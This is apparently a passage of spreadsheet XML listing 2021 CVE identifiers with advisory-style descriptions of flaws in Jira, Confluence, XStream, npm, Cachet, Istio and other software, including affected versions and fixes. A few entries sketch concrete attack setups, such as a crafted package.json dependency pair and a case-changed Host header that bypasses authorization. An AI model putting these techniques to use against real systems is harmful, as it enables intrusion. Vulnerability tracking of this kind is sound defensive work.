    <t>The Editor plugin in Atlassian Jira Server and Data Center before version 8.5.18, from 8.6.0 before 8.13.10, and from version 8.14.0 before 8.18.2 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the handling of supplied content such as from a PDF when pasted into a field such as the description field.</t>
  </si>
  <si>
    <t>CVE-2021-39112</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to redirect users to a malicious URL via a reverse tabnapping vulnerability in the Project Shortcuts feature. The affected versions are before version 8.5.15, from version 8.6.0 before 8.13.7, from version 8.14.0 before 8.17.1, and from version 8.18.0 before 8.18.1.</t>
  </si>
  <si>
    <t>CVE-2021-39113</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to continue to view cached content even after losing permissions, via a Broken Access Control vulnerability in the allowlist feature. The affected versions are before version 8.13.9, and from version 8.14.0 before 8.18.0.</t>
  </si>
  <si>
    <t>CVE-2021-39114</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Confluence Server and Data Center allow users with a valid account on a Confluence Data Center instance to execute arbitrary Java code or run arbitrary system commands by injecting an OGNL payload. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.</t>
  </si>
  <si>
    <t>CVE-2021-39115</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.</t>
  </si>
  <si>
    <t>CVE-2021-39116</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the GIF Image Reader component. The affected versions are before version 8.13.14, and from version 8.14.0 before 8.19.0.</t>
  </si>
  <si>
    <t>CVE-2021-39117</t>
  </si>
  <si>
    <t>The AssociateFieldToScreens page in Atlassian Jira Server and Data Center before version 8.18.0 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability via the name of a custom field.</t>
  </si>
  <si>
    <t>CVE-2021-39118</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to discover the usernames and full names of users via an enumeration vulnerability in the /rest/api/1.0/render endpoint. The affected versions are before version 8.19.0.</t>
  </si>
  <si>
    <t>CVE-2021-39119</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow users who have watched an issue to continue receiving updates on the issue even after their Jira account is revoked, via a Broken Access Control vulnerability in the issue notification feature. The affected versions are before version 8.19.0.</t>
  </si>
  <si>
    <t>CVE-2021-3912</t>
  </si>
  <si>
    <t>OctoRPKI tries to load the entire contents of a repository in memory, and in the case of a GZIP bomb, unzip it in memory, making it possible to create a repository that makes OctoRPKI run out of memory (and thus crash).</t>
  </si>
  <si>
    <t>CVE-2021-39121</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow authenticated remote attackers to enumerate the keys of private Jira projects via an Information Disclosure vulnerability in the /rest/api/latest/projectvalidate/key endpoint. The affected versions are before version 8.5.18, from version 8.6.0 before 8.13.10, and from version 8.14.0 before 8.18.2.</t>
  </si>
  <si>
    <t>CVE-2021-39122</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to view users' emails via an Information Disclosure vulnerability in the /rest/api/2/search endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.</t>
  </si>
  <si>
    <t>CVE-2021-39123</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the /rest/gadget/1.0/createdVsResolved/generate endpoint. The affected versions are before version 8.16.0.</t>
  </si>
  <si>
    <t>CVE-2021-39124</t>
  </si>
  <si>
    <t>The Cross-Site Request Forgery (CSRF) failure retry feature of Atlassian Jira Server and Data Center before version 8.16.0 allows remote attackers who are able to trick a user into retrying a request to bypass CSRF protection and replay a crafted request.</t>
  </si>
  <si>
    <t>CVE-2021-39125</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to discover the usernames of users via an enumeration vulnerability in the password reset page. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.1.</t>
  </si>
  <si>
    <t>CVE-2021-39126</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to modify various resources via a Cross-Site Request Forgery (CSRF) vulnerability, following an Information Disclosure vulnerability in the referrer headers which discloses a user's CSRF token. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.1.</t>
  </si>
  <si>
    <t>CVE-2021-39127</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to the query component JQL endpoint via a Broken Access Control vulnerability (BAC) vulnerability. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.1.</t>
  </si>
  <si>
    <t>CVE-2021-39128</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server or Data Center using the Jira Service Management addon allow remote attackers with JIRA Administrators access to execute arbitrary Java code via a server-side template injection vulnerability in the Email Template feature. The affected versions of Jira Server or Data Center are before version 8.13.12, and from version 8.14.0 before 8.19.1.</t>
  </si>
  <si>
    <t>CVE-2021-39131</t>
  </si>
  <si>
    <t>ced detects character encoding using Googleâ€™s compact_enc_det library. In ced v0.1.0, passing data types other than `Buffer` causes the Node.js process to crash. The problem has been patched in ced v1.0.0. As a workaround, before passing an argument to ced, verify itâ€™s a `Buffer` using `Buffer.isBuffer(obj)`.</t>
  </si>
  <si>
    <t>CVE-2021-39132</t>
  </si>
  <si>
    <t>Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Prior to version 3.3.14 and version 3.4.3, an authorized user can upload a zip-format plugin with a crafted plugin.yaml, or a crafted aclpolicy yaml file, or upload an untrusted project archive with a crafted aclpolicy yaml file, that can cause the server to run untrusted code on Rundeck Community or Enterprise Edition. An authenticated user can make a POST request, that can cause the server to run untrusted code on Rundeck Enterprise Edition. The zip-format plugin issues requires authentication and authorization to these access levels, and affects all Rundeck editions:`admin` level access to the `system` resource type. The ACL Policy yaml file upload issues requires authentication and authorization to these access levels, and affects all Rundeck editions: `create` `update` or `admin` level access to a `project_acl` resource, and/or`create` `update` or `admin` level access to the `system_acl` resource. The unauthorized POST request requires authentication, but no specific authorization, and affects Rundeck Enterprise only. Patches are available in versions 3.4.3, 3.3.14</t>
  </si>
  <si>
    <t>CVE-2021-39133</t>
  </si>
  <si>
    <t>Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Prior to version 3.3.14 and version 3.4.3, a user with `admin` access to the `system` resource type is potentially vulnerable to a CSRF attack that could cause the server to run untrusted code on all Rundeck editions. Patches are available in Rundeck versions 3.4.3 and 3.3.14.</t>
  </si>
  <si>
    <t>CVE-2021-39134</t>
  </si>
  <si>
    <t>`@npmcli/arborist`, the library that calculates dependency trees and manages the `node_modules` folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is, in part, accomplished by resolving dependency specifiers defined in `package.json` manifests for dependencies with a specific name, and nesting folders to resolve conflicting dependencies. When multiple dependencies differ only in the case of their name, Arborist's internal data structure saw them as separate items that could coexist within the same level in the `node_modules` hierarchy. However, on case-insensitive file systems (such as macOS and Windows), this is not the case. Combined with a symlink dependency such as `file:/some/path`, this allowed an attacker to create a situation in which arbitrary contents could be written to any location on the filesystem. For example, a package `pwn-a` could define a dependency in their `package.json` file such as `"foo": "file:/some/path"`. Another package, `pwn-b` could define a dependency such as `FOO: "file:foo.tgz"`. On case-insensitive file systems, if `pwn-a` was installed, and then `pwn-b` was installed afterwards, the contents of `foo.tgz` would be written to `/some/path`, and any existing contents of `/some/path` would be removed. Anyone using npm v7.20.6 or earlier on a case-insensitive filesystem is potentially affected. This is patched in @npmcli/arborist 2.8.2 which is included in npm v7.20.7 and above.</t>
  </si>
  <si>
    <t>CVE-2021-39135</t>
  </si>
  <si>
    <t>`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project's `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system. Note that symbolic links contained within package artifact contents are filtered out, so another means of creating a `node_modules` symbolic link would have to be employed. 1. A `preinstall` script could replace `node_modules` with a symlink. (This is prevented by using `--ignore-scripts`.) 2. An attacker could supply the target with a git repository, instructing them to run `npm install --ignore-scripts` in the root. This may be successful, because `npm install --ignore-scripts` is typically not capable of making changes outside of the project directory, so it may be deemed safe. This is patched in @npmcli/arborist 2.8.2 which is included in npm v7.20.7 and above. For more information including workarounds please see the referenced GHSA-gmw6-94gg-2rc2.</t>
  </si>
  <si>
    <t>CVE-2021-39136</t>
  </si>
  <si>
    <t>baserCMS is an open source content management system with a focus on Japanese language support. In affected versions there is a cross-site scripting vulnerability in the file upload function of the management system of baserCMS. Users are advised to update as soon as possible. No workaround are available to mitigate this issue.</t>
  </si>
  <si>
    <t>CVE-2021-39137</t>
  </si>
  <si>
    <t>go-ethereum is the official Go implementation of the Ethereum protocol. In affected versions a consensus-vulnerability in go-ethereum (Geth) could cause a chain split, where vulnerable versions refuse to accept the canonical chain. Further details about the vulnerability will be disclosed at a later date. A patch is included in the upcoming `v1.10.8` release. No workaround are available.</t>
  </si>
  <si>
    <t>CVE-2021-39138</t>
  </si>
  <si>
    <t>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Developers can use the REST API to signup users and also allow users to login anonymously. Prior to version 4.5.1, when an anonymous user is first signed up using REST, the server creates session incorrectly. Particularly, the `authProvider` field in `_Session` class under `createdWith` shows the user logged in creating a password. If a developer later depends on the `createdWith` field to provide a different level of access between a password user and anonymous user, the server incorrectly classified the session type as being created with a `password`. The server does not currently use `createdWith` to make decisions about internal functions, so if a developer is not using `createdWith` directly, they are not affected. The vulnerability only affects users who depend on `createdWith` by using it directly. The issue is patched in Parse Server version 4.5.1. As a workaround, do not use the `createdWith` Session field to make decisions if one allows anonymous login.</t>
  </si>
  <si>
    <t>CVE-2021-39139</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</t>
  </si>
  <si>
    <t>CVE-2021-3914</t>
  </si>
  <si>
    <t>It was found that the smallrye health metrics UI component did not properly sanitize some user inputs. An attacker could use this flaw to conduct cross-site scripting attacks.</t>
  </si>
  <si>
    <t>CVE-2021-39140</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</t>
  </si>
  <si>
    <t>CVE-2021-39141</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</t>
  </si>
  <si>
    <t>CVE-2021-39143</t>
  </si>
  <si>
    <t>Spinnaker is an open source, multi-cloud continuous delivery platform. A path traversal vulnerability was discovered in uses of TAR files by AppEngine for deployments. This uses a utility to extract files locally for deployment without validating the paths in that deployment don't override system files. This would allow an attacker to override files on the container, POTENTIALLY introducing a MITM type attack vector by replacing libraries or injecting wrapper files. Users are advised to update as soon as possible. For users unable to update disable Google AppEngine deployments and/or disable artifacts that provide TARs.</t>
  </si>
  <si>
    <t>CVE-2021-39144</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</t>
  </si>
  <si>
    <t>CVE-2021-39145</t>
  </si>
  <si>
    <t>CVE-2021-39146</t>
  </si>
  <si>
    <t>CVE-2021-39147</t>
  </si>
  <si>
    <t>CVE-2021-39148</t>
  </si>
  <si>
    <t>CVE-2021-39149</t>
  </si>
  <si>
    <t>CVE-2021-3915</t>
  </si>
  <si>
    <t>CVE-2021-39150</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.</t>
  </si>
  <si>
    <t>CVE-2021-39151</t>
  </si>
  <si>
    <t>CVE-2021-39152</t>
  </si>
  <si>
    <t>CVE-2021-39153</t>
  </si>
  <si>
    <t>XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</t>
  </si>
  <si>
    <t>CVE-2021-39154</t>
  </si>
  <si>
    <t>CVE-2021-39155</t>
  </si>
  <si>
    <t>Istio is an open source platform for providing a uniform way to integrate microservices, manage traffic flow across microservices, enforce policies and aggregate telemetry data. According to [RFC 4343](https://datatracker.ietf.org/doc/html/rfc4343), Istio authorization policy should compare the hostname in the HTTP Host header in a case insensitive way, but currently the comparison is case sensitive. The proxy will route the request hostname in a case-insensitive way which means the authorization policy could be bypassed. As an example, the user may have an authorization policy that rejects request with hostname "httpbin.foo" for some source IPs, but the attacker can bypass this by sending the request with hostname "Httpbin.Foo". Patches are available in Istio 1.11.1, Istio 1.10.4 and Istio 1.9.8. As a work around a Lua filter may be written to normalize Host header before the authorization check. This is similar to the Path normalization presented in the [Security Best Practices](https://istio.io/latest/docs/ops/best-practices/security/#case-normalization) guide.</t>
  </si>
  <si>
    <t>CVE-2021-39156</t>
  </si>
  <si>
    <t>Istio is an open source platform for providing a uniform way to integrate microservices, manage traffic flow across microservices, enforce policies and aggregate telemetry data. Istio 1.11.0, 1.10.3 and below, and 1.9.7 and below contain a remotely exploitable vulnerability where an HTTP request with `#fragment` in the path may bypass Istioâ€™s URI path based authorization policies. Patches are available in Istio 1.11.1, Istio 1.10.4 and Istio 1.9.8. As a work around a Lua filter may be written to normalize the path.</t>
  </si>
  <si>
    <t>CVE-2021-39157</t>
  </si>
  <si>
    <t>detect-character-encoding is an open source character encoding inspection library. In detect-character-encoding v0.6.0 and earlier, data matching no charset causes the Node.js process to crash. The problem has been patched in [detect-character-encoding v0.7.0](https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.7.0). No workaround are available and all users should update to resolve this issue.</t>
  </si>
  <si>
    <t>CVE-2021-39158</t>
  </si>
  <si>
    <t>NVCaffe's python required dependencies list used to contain `gfortran`version prior to 0.17.4, entry which does not exist in the repository pypi.org. An attacker could potentially have posted malicious files to pypi.org causing a user to install it within NVCaffe.</t>
  </si>
  <si>
    <t>CVE-2021-39159</t>
  </si>
  <si>
    <t>BinderHub is a kubernetes-based cloud service that allows users to share reproducible interactive computing environments from code repositories. In affected versions a remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the BinderHub context, with the potential to egress credentials of the BinderHub deployment, including JupyterHub API tokens, kubernetes service accounts, and docker registry credentials. This may provide the ability to manipulate images and other user created pods in the deployment, with the potential to escalate to the host depending on the underlying kubernetes configuration. Users are advised to update to version 0.2.0-n653. If users are unable to update they may disable the git repo provider by specifying the `BinderHub.repo_providers` as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-3916</t>
  </si>
  <si>
    <t>CVE-2021-39160</t>
  </si>
  <si>
    <t>nbgitpuller is a Jupyter server extension to sync a git repository one-way to a local path. Due to unsanitized input, visiting maliciously crafted links could result in arbitrary code execution in the user environment. This has been resolved in version 0.10.2 and all users are advised to upgrade. No work around exist for users who can not upgrade.</t>
  </si>
  <si>
    <t>CVE-2021-39161</t>
  </si>
  <si>
    <t>Discourse is an open source platform for community discussion. In affected versions category names can be used for Cross-site scripting(XSS) attacks. This is mitigated by Discourse's default Content Security Policy and this vulnerability only affects sites which have modified or disabled or changed Discourse's default Content Security Policy have allowed for moderators to modify categories. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to ensure that the Content Security Policy is enabled, and has not been modified in a way which would make it more vulnerable to XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2021-39162</t>
  </si>
  <si>
    <t>Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, can abnormally terminate if an H/2 GOAWAY and SETTINGS frame are received in the same IO event. This can lead to a DoS in the presence of untrusted *upstream* servers. 0.15.1 contains an upgraded envoy binary with this vulnerability patched. If only trusted upstreams are configured, there is not substantial risk of this condition being triggered.</t>
  </si>
  <si>
    <t>CVE-2021-39163</t>
  </si>
  <si>
    <t>Matrix is an ecosystem for open federated Instant Messaging and Voice over IP. In versions 1.41.0 and prior, unauthorised users can access the name, avatar, topic and number of members of a room if they know the ID of the room. This vulnerability is limited to homeservers where the vulnerable homeserver is in the room and untrusted users are permitted to create groups (communities). By default, only homeserver administrators can create groups. However, homeserver administrators can already access this information in the database or using the admin API. As a result, only homeservers where the configuration setting `enable_group_creation` has been set to `true` are impacted. Server administrators should upgrade to 1.41.1 or higher to patch the vulnerability. There are two potential workarounds. Server administrators can set `enable_group_creation` to `false` in their homeserver configuration (this is the default value) to prevent creation of groups by non-administrators. Administrators that are using a reverse proxy could, with partial loss of group functionality, block the endpoints `/_matrix/client/r0/groups/{group_id}/rooms` and `/_matrix/client/unstable/groups/{group_id}/rooms`.</t>
  </si>
  <si>
    <t>CVE-2021-39164</t>
  </si>
  <si>
    <t>Matrix is an ecosystem for open federated Instant Messaging and Voice over IP. In versions 1.41.0 and prior, unauthorised users can access the membership (list of members, with their display names) of a room if they know the ID of the room. The vulnerability is limited to rooms with `shared` history visibility. Furthermore, the unauthorised user must be using an account on a vulnerable homeserver that is in the room. Server administrators should upgrade to 1.41.1 or later in order to receive the patch. One workaround is available. Administrators of servers that use a reverse proxy could, with potentially unacceptable loss of functionality, block the endpoints: `/_matrix/client/r0/rooms/{room_id}/members` with `at` query parameter, and `/_matrix/client/unstable/rooms/{room_id}/members` with `at` query parameter.</t>
  </si>
  <si>
    <t>CVE-2021-39165</t>
  </si>
  <si>
    <t>Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet &lt;https://github.com/CachetHQ/Cachet&gt; is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.</t>
  </si>
  <si>
    <t>CVE-2021-39166</t>
  </si>
  <si>
    <t>Pimcore is an open source data &amp; experience management platform. Prior to version 10.1.2, text-values were not properly escaped before printed in the version preview. This allowed XSS by authenticated users with access to the resources. This issue is patched in Pimcore version 10.1.2.</t>
  </si>
  <si>
    <t>CVE-2021-39167</t>
  </si>
  <si>
    <t>OpenZepplin is a library for smart contract development. In affected versions a vulnerability in TimelockController allowed an actor with the executor role to escalate privileges. Further details about the vulnerability will be disclosed at a later date. As a workaround revoke the executor role from accounts not strictly under the team's control. We recommend revoking all executors that are not also proposers. When applying this mitigation, ensure there is at least one proposer and executor remaining.</t>
  </si>
  <si>
    <t>CVE-2021-39168</t>
  </si>
  <si>
    <t>CVE-2021-39169</t>
  </si>
  <si>
    <t>Misskey is a decentralized microblogging platform. In versions of Misskey prior to 12.51.0, malicious actors can use the web client built-in dialog to display a malicious string, leading to cross-site scripting (XSS). XSS could compromise the API request token. This issue has been fixed in version 12.51.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-3917</t>
  </si>
  <si>
    <t>A flaw was found in the coreos-installer, where it writes the Ignition config to the target system with world-readable access permissions. This flaw allows a local attacker to have read access to potentially sensitive data. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39170</t>
  </si>
  <si>
    <t>Pimcore is an open source data &amp; experience management platform. Prior to version 10.1.2, an authenticated user could add XSS code as a value of custom metadata on assets. There is a patch for this issue in Pimcore version 10.1.2. As a workaround, users may apply the patch manually.</t>
  </si>
  <si>
    <t>CVE-2021-39171</t>
  </si>
  <si>
    <t>Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. Prior to version 3.1.0, a malicious SAML payload can require transforms that consume significant system resources to process, thereby resulting in reduced or denied service. This would be an effective way to perform a denial-of-service attack. This has been resolved in version 3.1.0. The resolution is to limit the number of allowable transforms to 2.</t>
  </si>
  <si>
    <t>CVE-2021-39172</t>
  </si>
  <si>
    <t>Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.</t>
  </si>
  <si>
    <t>CVE-2021-39173</t>
  </si>
  <si>
    <t>Cachet is an open source status page system. Prior to version 2.5.1 authenticated users, regardless of their privileges (User or Admin), can trick Cachet and install the instance again, leading to arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving the middleware `ReadyForUse`, which now performs a stricter validation of the instance name. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.</t>
  </si>
  <si>
    <t>CVE-2021-39174</t>
  </si>
  <si>
    <t>Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.</t>
  </si>
  <si>
    <t>75</t>
  </si>
  <si>
    <t>CVE-2021-39175</t>
  </si>
  <si>
    <t>HedgeDoc is a platform to write and share markdown. In versions prior to 1.9.0, an unauthenticated attacker can inject arbitrary JavaScript into the speaker-notes of the slide-mode feature by embedding an iframe hosting the malicious code into the slides or by embedding the HedgeDoc instance into another page. The problem is patched in version 1.9.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39176</t>
  </si>
  <si>
    <t>detect-character-encoding is a package for detecting character encoding using ICU. In detect-character-encoding v0.3.0 and earlier, allocated memory is not released. The problem has been patched in detect-character-encoding v0.3.1.</t>
  </si>
  <si>
    <t>CVE-2021-39177</t>
  </si>
  <si>
    <t>Geyser is a bridge between Minecraft: Bedrock Edition and Minecraft: Java Edition. Versions of Geyser prior to 1.4.2-SNAPSHOT allow anyone that can connect to the server to forge a LoginPacket with manipulated JWT token allowing impersonation as any user. Version 1.4.2-SNAPSHOT contains a patch for the issue. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39178</t>
  </si>
  <si>
    <t>Next.js is a React framework. Versions of Next.js between 10.0.0 and 11.0.0 contain a cross-site scripting vulnerability. In order for an instance to be affected by the vulnerability, the `next.config.js` file must have `images.domains` array assigned and the image host assigned in `images.domains` must allow user-provided SVG. If the `next.config.js` file has `images.loader` assigned to something other than default or the instance is deployed on Vercel, the instance is not affected by the vulnerability. The vulnerability is patched in Next.js version 11.1.1.</t>
  </si>
  <si>
    <t>CVE-2021-39179</t>
  </si>
  <si>
    <t>DHIS 2 is an information system for data capture, management, validation, analytics and visualization. A SQL Injection vulnerability in the Tracker component in DHIS2 Server allows authenticated remote attackers to execute arbitrary SQL commands via unspecified vectors. This vulnerability affects the `/api/trackedEntityInstances` and `/api/trackedEntityInstances/query` API endpoints in all DHIS2 versions 2.34, 2.35, and 2.36. It also affects versions 2.32 and 2.33 which have reached _end of support_ - exceptional security updates have been added to the latest *end of support* builds for these versions. Versions 2.31 and older are unaffected. The system is vulnerable to attack only from users that are logged in to DHIS2, and there is no known way of exploiting the vulnerability without first being logged in as a DHIS2 user. The vulnerability is not exposed to a non-malicious user - the vulnerability requires a conscious attack to be exploited. A successful exploit of this vulnerability could allow the malicious user to read, edit and delete data in the DHIS2 instance. There are no known exploits of the security vulnerabilities addressed by these patch releases. Security patches are available in DHIS2 versions 2.32-EOS, 2.33-EOS, 2.34.7, 2.35.7, and 2.36.4. There is no straightforward known workaround for DHIS2 instances using the Tracker functionality other than upgrading the affected DHIS2 server to one of the patches in which this vulnerability has been fixed. For implementations which do NOT use Tracker functionality, it may be possible to block all network access to POST to the `/api/trackedEntityInstances`, and `/api/trackedEntityInstances/query` endpoints as a temporary workaround while waiting to upgrade.</t>
  </si>
  <si>
    <t>CVE-2021-3918</t>
  </si>
  <si>
    <t>json-schema is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-39180</t>
  </si>
  <si>
    <t>OpenOLAT is a web-based learning management system (LMS). A path traversal vulnerability exists in versions prior to 15.3.18, 15.5.3, and 16.0.0. Using a specially prepared ZIP file, it is possible to overwrite any file that is writable by the application server user (e.g. the tomcat user). Depending on the configuration this can be limited to files of the OpenOlat user data directory, however, if not properly set up, the attack could also be used to overwrite application server config files, java code or even operating system files. The attack could be used to corrupt or modify any OpenOlat file such as course structures, config files or temporary test data. Those attack would require in-depth knowledge of the installation and thus more theoretical. If the app server configuration allows the execution of jsp files and the path to the context is known, it is also possible to execute java code. If the app server runs with the same user that is used to deploy the OpenOlat code or has write permissions on the OpenOlat code files and the path to the context is know, code injection is possible. The attack requires an OpenOlat user account to upload a ZIP file and trigger the unzip method. It can not be exploited by unregistered users. The problem is fixed in versions 15.3.18, 15.5.3 and 16.0.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39181</t>
  </si>
  <si>
    <t>OpenOlat is a web-based learning management system (LMS). Prior to version 15.3.18, 15.5.3, and 16.0.0, using a prepared import XML file (e.g. a course) any class on the Java classpath can be instantiated, including spring AOP bean factories. This can be used to execute code arbitrary code by the attacker. The attack requires an OpenOlat user account with the authoring role. It can not be exploited by unregistered users. The problem is fixed in versions 15.3.18, 15.5.3, and 16.0.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-39182</t>
  </si>
  <si>
    <t>EnroCrypt is a Python module for encryption and hashing. Prior to version 1.1.4, EnroCrypt used the MD5 hashing algorithm in the hashing file. Beginners who are unfamiliar with hashes can face problems as MD5 is considered an insecure hashing algorithm. The vulnerability is patched in v1.1.4 of the product. As a workaround, users can remove the `MD5` hashing function from the file `hashing.py`.</t>
  </si>
  <si>
    <t>CVE-2021-39183</t>
  </si>
  <si>
    <t>Owncast is an open source, self-hosted live video streaming and chat server. In affected versions inline scripts are executed when Javascript is parsed via a paste action. This issue is patched in 0.0.9 by blocking unsafe-inline Content Security Policy and specifying the script-src. The worker-src is required to be set to blob for the video player.</t>
  </si>
  <si>
    <t>CVE-2021-39184</t>
  </si>
  <si>
    <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. A vulnerability in versions prior to 11.5.0, 12.1.0, and 13.3.0 allows a sandboxed renderer to request a "thumbnail" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases. Versions 15.0.0-alpha.10, 14.0.0, 13.3.0, 12.1.0, and 11.5.0 all contain a fix for the vulnerability. Two workarounds aside from upgrading are available. One may make the vulnerability significantly more difficult for an attacker to exploit by enabling `contextIsolation` in one's app. One may also disable the functionality of the `createThumbnailFromPath` API if one does not need it.</t>
  </si>
  <si>
    <t>CVE-2021-39185</t>
  </si>
  <si>
    <t>Http4s is a minimal, idiomatic Scala interface for HTTP services. In http4s versions 0.21.26 and prior, 0.22.0 through 0.22.2, 0.23.0, 0.23.1, and 1.0.0-M1 through 1.0.0-M24, the default CORS configuration is vulnerable to an origin reflection attack. The middleware is also susceptible to a Null Origin Attack. The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. See the GitHub GHSA for more information, including code examples and workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-39186</t>
  </si>
  <si>
